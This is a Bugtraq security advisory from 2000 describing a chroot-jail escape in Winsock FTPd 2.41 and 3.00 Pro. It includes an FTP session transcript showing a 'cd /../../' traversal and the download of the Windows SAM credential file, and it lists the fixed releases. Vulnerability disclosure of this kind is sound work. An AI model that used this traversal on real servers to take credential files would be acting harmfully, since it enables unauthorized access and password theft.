[17825] in bugtraq
Vulnerability in Winsock FTPD 2.41/3.00 (Pro)
daemon@ATHENA.MIT.EDU (Interstellar Overdrive)
Tue Nov 28 17:19:27 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3A227BEA.1969E6B0@home.com>
Date: Mon, 27 Nov 2000 17:21:15 +0200
Reply-To: Interstellar Overdrive <interdrive@HOME.COM>
From: Interstellar Overdrive <interdrive@HOME.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
[ Overdrive Advisory # 1 ]
---------------------------[ Synopsis ]
Subject : Vulnerability in Winsock ftpd
Application : Winsock FTPd v2.41 RC14, Winsock FTPd v2.41 Pro,
Winsock FTPd v3.00 Pro
Platform : Win32
Description : a local user can break the chroot jail
Date : 11/28/2000
Author : Interstellar Overdrive
E-Mail : overdrive@workspot.net
WWW : http://www.workspot.net/~overdrive/
--------------------------[ Application Info ]
Winsock FTPd is common popular ftp server for windows95/98/3.11/NT/2K,
by
Texas Imperial Software it is simple, inexpensive, and easy to set ftp
server for
windows machines, current release is v3.0.
Homepage : http://www.wftpd.com
Author : Alun Jones <alun@texis.com>
-------------------------[ Overview ]
In Winsock ftpd, there is an option called "Restrict to home directory
and below"
where the server makes a chroot jail for the user. lets take an example
:
-----snip------
c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
ftp>pwd
257 "/" is current directory #io's directory here c:\wftpd\io
#and it is chroot'ed
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
my_file.txt
my_code.c
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
ftp>
#until now chroot jail working fine...
#hmmm, lets try doing 'cd /../../'
ftp>cd /../../
250 "/../.." is current directory
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
wftpd
inetpub
DOS
WINA20.386
CONFIG.DOS
CONFIG.SYS
WINNT
AUTOEXEC.BAT
Program Files
TEMP
COMMAND.COM
.....etc # cool !
#even more fun
ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc we got the file...
---------snap-------
The problem is that the chroot jail only works if the user tried
../../../ not /../../../,
by simply adding a "/" before ../../(which is a common known bug in
win32 applications)
any local user or even anonymous user can change his working directory
to any directory on
the server, having the ability to download any file from the server(as
you saw above).
In other words, the chroot jail is broken.
Vulnerable Winsock FTPd Applications Found :
Winsock FTPd v2.41 RC14
Winsock FTPd v2.41 RC14 Pro
Winsock FTPd v3.00 Pro
-----------------------------[ FIX ]
Vendor contacted, A new release of Wftpd is out
which fixes the problem.
- Wftpd v2.41 RC15
- Wftpd v3.00 R2
<http://www.wftpd.com>
-----------------------------[ Credits ]
Interstellar Overdrive (interdrive@home.com - overdrive@workspot.net)
